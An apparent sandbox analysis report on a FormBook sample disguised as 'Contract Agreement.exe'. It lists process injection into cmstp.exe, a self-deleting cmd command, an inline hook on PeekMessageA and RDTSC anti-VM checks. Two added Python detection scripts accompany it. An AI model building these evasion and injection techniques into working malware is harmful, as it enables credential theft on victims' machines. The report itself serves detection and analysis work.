          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419E90 NtClose,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419D5A NtCreateFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419DB4 NtReadFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419E0A NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047396D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0473AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047395F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0473A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0473A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047397A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0473B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047398F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047398A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047399D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0473A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9E90 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9E0A NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9DB4 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9D5A NtCreateFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: String function: 00A1B150 appears 133 times
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: String function: 0041BBE0 appears 38 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 046FB150 appears 136 times
Source: Contract Agreement.exe, 00000000.00000003.648343088.000000001EF16000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Contract Agreement.exe
Source: Contract Agreement.exe, 00000001.00000002.688088335.0000000000B0F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Contract Agreement.exe
Source: Contract Agreement.exe, 00000001.00000002.687889109.0000000000970000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCMSTP.EXE` vs Contract Agreement.exe
Source: Contract Agreement.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/3@4/2
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:120:WilError_01
Source: C:\Users\user\Desktop\Contract Agreement.exe File created: C:\Users\user\AppData\Local\Temp\nsg2E20.tmp
Source: Contract Agreement.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Contract Agreement.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Contract Agreement.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Contract Agreement.exe ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\Contract Agreement.exe File read: C:\Users\user\Desktop\Contract Agreement.exe
Source: unknown Process created: C:\Users\user\Desktop\Contract Agreement.exe 'C:\Users\user\Desktop\Contract Agreement.exe'
Source: C:\Users\user\Desktop\Contract Agreement.exe Process created: C:\Users\user\Desktop\Contract Agreement.exe 'C:\Users\user\Desktop\Contract Agreement.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Contract Agreement.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Contract Agreement.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cmstp.pdbGCTL source: Contract Agreement.exe, 00000001.00000002.687889109.0000000000970000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000002.916848212.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Contract Agreement.exe, 00000000.00000003.644430719.000000001EF60000.00000004.00000001.sdmp, Contract Agreement.exe, 00000001.00000002.688088335.0000000000B0F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.907753990.00000000046D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Contract Agreement.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: Contract Agreement.exe, 00000001.00000002.687889109.0000000000970000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000002.916848212.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Contract Agreement.exe Unpacked PE file: 1.2.Contract Agreement.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
Source: 1hqxmv.dll.0.dr Static PE information: section name: .code
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_2_004048E9 push ebp; retf
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_2_00417138 push ecx; iretd
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_2_0040993B pushad ; retf
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_2_004169DF push eax; iretd
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_2_0041CEB5 push eax; ret
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_2_0041CF6C push eax; ret
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_2_0041CF02 push eax; ret
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_2_0041CF0B push eax; ret
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_2_00A6D0D1 push ecx; ret
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_1_004048E9 push ebp; retf
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_1_00417138 push ecx; iretd
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_1_0040993B pushad ; retf
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_1_004169DF push eax; iretd
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_1_0041CEB5 push eax; ret
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_1_0041CF6C push eax; ret
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_1_0041CF02 push eax; ret
Source: C:\Users\user\Desktop\Contract Agreement.exe Code function: 1_1_0041CF0B push eax; ret
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0474D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_02BA48E9 push ebp; retf
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_02BB69DF push eax; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BA993B pushad ; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB7138 push ecx; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BBCEB5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BBCF0B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BBCF02 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BBCF6C push eax; ret
          Source: C:\Users\user\Desktop\Contract Agreement.exeFile created: C:\Users\user\AppData\Local\Temp\nsg2E21.tmp\1hqxmv.dllJump to dropped file
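The push/retf, push/iretd and pushad/retf pairs listed above are the sandbox's static hint that control flow is being redirected through the stack rather than through ordinary calls, which is typical of an unpacking stub; a compiler does not emit far returns or iretd in user-mode application code, while push/ret is a common trampoline. Note that the same pairs appear at the same offsets in the hollowed image (1_1 and 1_2) and again in cmstp.exe with every address shifted by 0x027A0000 (004048E9 becomes 02BA48E9, 0040993B becomes 02BA993B), i.e. the identical unpacked code was mapped into the injected process at a different base. The scanner below is an added example written for this page, not Joe Sandbox code or code from the sample: it finds such two-byte pairs in a raw code buffer and rates far/interrupt returns above a plain ret. The sample buffer is constructed (a hot-patch prologue followed by the five pair types the report names) and the base address 0x401000 is an assumption. Because it matches opcode bytes without disassembling, it also fires on data and on ModRM or immediate bytes inside longer instructions, so the result is a triage signal, not proof.

```python
"""Heuristic scanner for push/return control-flow gadgets in raw x86 code.
Added example for this page; not code from the report or from the sample."""
from __future__ import annotations
from typing import NamedTuple

# Single-byte x86 opcodes. PUSH r32 is 0x50 + register number; PUSHAD is 0x60.
PUSH_REG = {0x50 + i: r for i, r in enumerate(
    ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"))}
PUSHAD = 0x60
# ret (near), retf (far: also pops CS) and iretd (pops EIP, CS and EFLAGS).
RETURNS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}

class Gadget(NamedTuple):
    va: int         # virtual address of the push
    text: str       # disassembly, e.g. "push ebp; retf"
    severity: str   # "high" for retf/iretd, "medium" for a plain ret

def find_push_ret_gadgets(code: bytes, base: int = 0) -> list[Gadget]:
    """Return every push/return byte pair in `code`, in address order."""
    found = []
    for i in range(len(code) - 1):
        op, ret = code[i], code[i + 1]
        if ret not in RETURNS:
            continue
        if op in PUSH_REG:
            mnemonic = f"push {PUSH_REG[op]}"
        elif op == PUSHAD:
            mnemonic = "pushad"
        else:
            continue
        severity = "medium" if ret == 0xC3 else "high"
        found.append(Gadget(base + i, f"{mnemonic}; {RETURNS[ret]}", severity))
    return found

def gadget_density(code: bytes) -> float:
    """Gadgets per KiB; a rough packer indicator when run over a .text section."""
    if not code:
        return 0.0
    return len(find_push_ret_gadgets(code)) * 1024 / len(code)

# Constructed sample (not bytes from the sample): a hot-patch prologue, then
# push ebp; retf / push ecx; iretd / pushad; retf / push eax; iretd / push eax; ret,
# separated by nops, followed by a lone ret.
SAMPLE_TEXT = bytes.fromhex("8BFF558BEC" "90" "55CB" "90" "51CF" "90" "60CB"
                            "90" "50CF" "90" "50C3" "C3")
SAMPLE_BASE = 0x401000   # assumed image base + .text RVA

if __name__ == "__main__":
    for g in find_push_ret_gadgets(SAMPLE_TEXT, SAMPLE_BASE):
        print(f"{g.va:08X}  {g.text:<16} {g.severity}")
    print(f"density: {gadget_density(SAMPLE_TEXT):.1f} gadgets/KiB")
```

Run it over a dumped .text section (for this sample, the 1.2 unpack region the report names) and compare the density with a known-clean binary; a handful of high-severity hits clustered in one region is the pattern the sandbox's "push ...; retf/iretd" lines describe.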

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE0
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Contract Agreement.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
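The PeekMessageA finding is a user-mode inline hook in explorer.exe, consistent with FormBook's known hooking of message-loop APIs to intercept input: the first bytes of the exported function were overwritten so that calls pass through injected code. The sandbox prints only the six new bytes, not the original ones. The classifier below is an added example, not code from the report or from the sample: given the expected clean prologue and the bytes actually mapped, it reports whether the function is patched and, when the patch is one of the usual trampolines (jmp rel32; push imm32 followed by ret; jmp dword ptr [abs32]), where it transfers control. The clean prologue (mov edi, edi; push ebp; mov ebp, esp) and every address in the sample table are assumptions; the PeekMessageA entry reuses the six bytes from the report, which form none of those trampolines and so come back as an unrecognized patch. On a live host the clean bytes come from the DLL's on-disk image after relocation, which this example leaves to the caller.

```python
"""Classify a user-mode inline hook from a function's first bytes.
Added example for this page; not code from the report or from the sample."""
from __future__ import annotations
import struct
from typing import Optional

# Assumed clean prologue of a 32-bit hot-patchable Win32 export
# (8B FF mov edi, edi; 55 push ebp; 8B EC mov ebp, esp). The report does not
# show the original bytes, so this is an assumption, not data from the page.
CLEAN_PROLOGUE = bytes.fromhex("8BFF558BEC")

def classify_hook(func_va: int, clean: bytes, live: bytes) -> Optional[dict]:
    """Compare the bytes mapped at a function (live) with the expected bytes
    (clean). None means untouched; otherwise a dict with the patch kind and,
    for the common trampolines, the address control is transferred to."""
    n = min(len(clean), len(live))
    if n == 0 or clean[:n] == live[:n]:
        return None
    info = {"kind": "unrecognized patch", "target": None, "bytes": live.hex(" ")}
    if live[:1] == b"\xE9" and len(live) >= 5:                       # jmp rel32
        rel = struct.unpack_from("<i", live, 1)[0]                   # signed disp
        info.update(kind="jmp rel32", target=(func_va + 5 + rel) & 0xFFFFFFFF)
    elif live[:1] == b"\x68" and len(live) >= 6 and live[5] == 0xC3:  # push imm32; ret
        info.update(kind="push/ret", target=struct.unpack_from("<I", live, 1)[0])
    elif live[:2] == b"\xFF\x25" and len(live) >= 6:                 # jmp dword ptr [abs32]
        info.update(kind="jmp [abs32]", target=struct.unpack_from("<I", live, 2)[0])
    return info

def scan_exports(exports: dict[str, tuple[int, bytes]],
                 clean: bytes = CLEAN_PROLOGUE) -> dict[str, dict]:
    """Return {export name: hook description} for every patched entry."""
    hooked = {}
    for name, (va, live) in exports.items():
        verdict = classify_hook(va, clean, live)
        if verdict is not None:
            hooked[name] = verdict
    return hooked

# Constructed table of (virtual address, first six mapped bytes). PeekMessageA
# carries the six "new code" bytes quoted in the report; the addresses and the
# other three entries are made up for illustration.
SAMPLE_EXPORTS = {
    "user32!PeekMessageA":  (0x77D01000, bytes.fromhex("488BB8822EE0")),
    "user32!GetMessageA":   (0x77D02000, bytes.fromhex("8BFF558BEC90")),  # untouched
    "user32!SendMessageA":  (0x77D03000, bytes.fromhex("E9FB0F000090")),  # jmp rel32
    "kernel32!CreateFileW": (0x75A01000, bytes.fromhex("6878563412C3")),  # push/ret
}

if __name__ == "__main__":
    for name, v in scan_exports(SAMPLE_EXPORTS).items():
        tgt = f"-> {v['target']:08X}" if v["target"] is not None else ""
        print(f"{name:<22} {v['kind']:<18} {v['bytes']} {tgt}")
```

A jmp rel32 target inside a private, executable, non-image region (the kind the report's memory dumps with 00000040 protection flags correspond to) is the strongest signal; an unrecognized patch still deserves a look, since a hook can begin with any instruction the injector chose to emit.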

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Contract Agreement.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Contract Agreement.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 0000000002BA98E4 second address: 0000000002BA98EA instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
